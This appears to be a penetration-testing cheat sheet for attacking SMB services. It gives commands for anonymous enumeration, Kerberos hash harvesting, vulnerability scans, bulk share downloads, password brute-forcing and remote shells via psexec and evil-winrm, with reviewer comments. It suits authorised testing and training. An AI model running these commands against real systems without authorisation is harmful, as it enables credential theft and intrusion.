#
Port 139/445 - SMB
#
Methodology
With No Creds
# --- Unauthenticated enumeration (null / anonymous session) ---
# NetBIOS name service: host name, workgroup/domain and logged-on user names
nbtscan {IP}
# Share listing with no credentials at all
smbmap -H {IP}
# Same, but as an explicit null session (empty user and password)
smbmap -H {IP} -u null -p null
# -N: do not prompt for a password, -L: list the shares offered by the host
smbclient -N -L //{IP}
# Retry with the minimum client protocol lowered to LANMAN1 for hosts that only speak SMB1
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
# MS-RPC over SMB; prompts for a password (press Enter for a null session)
rpcclient {IP}
# Same with an explicit empty username
rpcclient -U "" {IP}
# Fingerprint: OS, host/domain name and whether SMB signing is required
crackmapexec smb {IP}
# Password and lockout policy over a null session — read this before any password guessing
crackmapexec smb {IP} --pass-pol -u "" -p ""
# impacket: enumerate domain users through an anonymous LDAP bind (fails when anonymous bind is disabled)
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
# impacket: request AS-REPs for accounts without Kerberos pre-authentication, in hashcat format
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
# impacket: service tickets for accounts with an SPN; this normally needs a valid domain account,
# so the no-creds form will prompt for a password
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
# impacket: 32- vs 64-bit Windows; NOTE(review): this uses the RPC endpoint mapper (tcp/135), not SMB — confirm it is reachable
getArch.py -target {IP}
With Creds
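# --- Authenticated enumeration ---
# Share listing as a known user. The password on the command line is visible in
# `ps` output and shell history; omit -p to be prompted when that matters.
smbmap -H {IP} -u {Username} -p {Password}
# List shares with a domain account. smbclient takes the account in -U and the
# workgroup/domain in -W; -L lists the shares on the host. (-h only prints the help
# text and -l sets the log directory, so neither belongs in this command.)
smbclient -L //{IP} -U {Username} -W {Domain_Name}
# Same, authenticating with the account's NT hash instead of a password: with
# --pw-nt-hash the password part of -U is read as the hash. Single-quote the
# value so the shell does not treat it as a command substitution.
smbclient -L //{IP} -U '{Username}%{NT_Hash}' -W {Domain_Name} --pw-nt-hash
# Share listing plus the permissions the account has on each share
crackmapexec smb {IP} -u {Username} -p {Password} --shares
# impacket, authenticated variants of the three queries above
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request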
#
Enumerate All
enum4linux -a 10.10.10.x
#
Check for vulnerabilities
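# List the SMB vulnerability-check scripts shipped with the local nmap install
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
# Run every smb-vuln-* script. Quote the glob so the shell passes it to nmap
# unexpanded instead of matching files in the current directory. Check each
# script's categories first: some are intrusive and can crash the target service.
sudo nmap --script "smb-vuln*" -p 139,445 10.10.10.x
# Legacy aggregated check. NOTE(review): smb-check-vulns.nse was superseded by the
# smb-vuln-* scripts and is no longer shipped with recent nmap releases, so this
# line may fail with a "did not match" error — confirm against the installed version.
sudo nmap --script=smb-check-vulns.nse <targetip> -p445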
#
List Open Shares
# -L: list shares; prompts for a password (press Enter to try a null session)
smbclient -L 10.10.10.x
# Shares and access level, no credentials
smbmap -H 10.10.10.x
# Same, as the "anonymous" account
smbmap -H 10.10.10.x -u anonymous
# Shares via an explicit empty user/password pair
crackmapexec smb 10.10.10.x --shares -u '' -p ''
#
List Files in share
# -r: recursive directory listing of every readable share, limited to 5 levels
smbmap -H 10.10.10.x -u anonymous -r --depth 5
# Same with credentials (example values); the password is visible in `ps` and shell history
smbmap -H 10.10.10.182 -u s.smith -p myp4ss -r --depth 5
#
Mount a share to browse locally
mount -t cifs //10.10.10.x/Backups /mnt/smb
#
Connect to SMB share
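# Interactive session on a share. The service name must include the share, and -U
# needs an account name (smbclient then prompts for the password) — a bare -U is an error.
smbclient //10.10.10.x/[SHARE] -U {Username}
# Empty username: null-session / guest attempt
smbclient //10.10.10.x/[SHARE] -U ''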
#
Get password policy
crackmapexec smb 10.10.10.x --pass-pol
#
Bruteforce SMB Login
# Every user in users.txt against every password in the list. Stay under the lockout
# threshold reported by --pass-pol; each failure is logged on the DC as a failed logon.
crackmapexec smb 10.10.10.172 -u users.txt -p /usr/share/wordlists/rockyou.txt
# -t 1: one connection at a time, -V: show each attempt, -f: stop at the first valid pair,
# -l: single login name, -P: password list
hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
#
Download all files from share
smbget -R smb://192.168.100.120/Office
#
WinRM
# Test one password against every user in the file over WinRM (tcp/5985); a hit
# means the account is in the Remote Management Users group or is a local admin
crackmapexec winrm 192.168.100.55 -u /home/kali/users.txt -p 'secretpassword'
# Got pwned? Use PSEXEC or WINRM to login!
# PSEXEC — uploads a service binary to ADMIN$ and registers a service, so it needs
# local-admin rights and is noisy (the service install is logged on the host).
# NOTE(review): impacket is Python 3 only in current releases (Kali ships it as
# impacket-psexec), and sudo is not needed for a remote operation — confirm the install.
sudo python2 psexec.py megacorp.org/bob:'secretpassword'@192.168.100.55
# WinRM — interactive PowerShell over WinRM: -i host, -u user, -p password
evil-winrm -i 192.168.100.55 -u bob -p 'secretpassword'